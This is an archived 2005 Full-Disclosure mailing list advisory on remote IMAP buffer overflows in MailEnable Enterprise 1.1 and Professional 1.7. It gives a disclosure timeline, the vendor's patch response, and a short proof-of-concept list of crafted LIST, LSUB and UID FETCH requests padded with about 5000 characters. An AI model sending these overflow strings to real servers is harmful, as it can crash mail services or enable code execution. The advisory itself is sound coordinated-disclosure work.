OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[Full-disclosure] [ACSSEC-2005-11-27-0x2] Remote Overflows in Mailenable Enterprise 1.1 / Professional 1.7

From: Security Advisories (Security-Advisoriesacs-inc.com)
Date: Tue Dec 20 2005 - 03:28:56 CST


Re: See-Security Research and Development
"A remote buffer overflow exists in MailEnable Enterprise 1.1 IMAP EXAMINE
command, which allows for post authentication code execution. This
vulnerability affects Mailenable Enterprise 1.1 *without* the ME-10009.EXE
patch."

-- There's a reason why the ME-10009 patch was released. You're welcome!

-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
ACS Security Assessment Advisory - Buffer Overflow

ID: ACSSEC-2005-11-27 - 0x2

Class: Buffer Overflow
Package: MailEnable Enterprise Edition version 1.1
            MailEnable Professional version 1.7
Build: Windows NT/2k/XP/2k3
Reported: Dec 01, 2005
Released: Dec 21, 2005

Remote: Yes
Severity: Medium

Credit: Tim Shelton <security-advisoriesacs-inc.com>
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-

-=[ Background

MailEnable's mail server software provides a powerful, scalable
hosted messaging platform for Microsoft Windows. MailEnable
offers stability, unsurpassed flexibility and an extensive
feature set which allows you to provide cost-effective mail
services.

-=[ Technical Description

Multiple vulnerabilities has been identified in MailEnable,
which may be exploited by remote attackers to cause a denial
of service, or could lead to remote execution of code. This
issue is due to an error in the IMAP service that does not
properly handle specially crafted requests.

-=[ Proof of Concepts

IMAP REQUEST: '02 LIST /.:/' + Ax5000
IMAP REQUEST: '02 LSUB' /.:/ ('A' x 5000) request
IMAP REQUEST: '02 UID FETCH /.:/' AX5000 ' FLAGS'
IMAP REQUEST: '02 UID FETCH /...'x5 ' FLAGS'
IMAP REQUEST: '02 UID FETCH '/\'x5000 '

Several others exist and all have been reported to the vendor.

-=[ Solution

According to Peter Fregon of MailEnable Pty. Ltd, these advisories have been
patched in the latest ME-10009 Patch. Any further questions should be
directed towards the vendor.
http://www.mailenable.com/hotfix/default.asp

-=[ Credits

Vulnerability originally reported by Tim Shelton

-=[ Similar References

http://www.frsirt.com/english/advisories/2005/2579
http://www.frsirt.com/english/advisories/2005/2484

-=[ ChangeLog

2005-11-27 : Original Advisory
2005-12-01 : Notified Vendor
2005-12-03 : Vendor Response
2005-12-21 : Full Disclosure

-=[ Vendor Response
-----------------------------------------------------------------
Sat 12/3/2005 1:41 AM

Hi,
Thanks for the information. We have posted a hotfix for this at the
following URL:
http://www.mailenable.com/hotfix
We will also be updating our installation kits with this hotfix shortly.
 
Thanks
Peter Fregon
MailEnable Pty. Ltd.
 
------
Friday, 2 December 2005 03:02
All -
Below is an internal advisory notification for MailEnable Enterprise Edition
version 1.1  and possibly others.  Attached is our Ethical Disclosure
Policy.  If you have any further questions, please do not hesitate to
contact us.
Thanks,
Tim Shelton
ACS Security Assessment Engineering

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/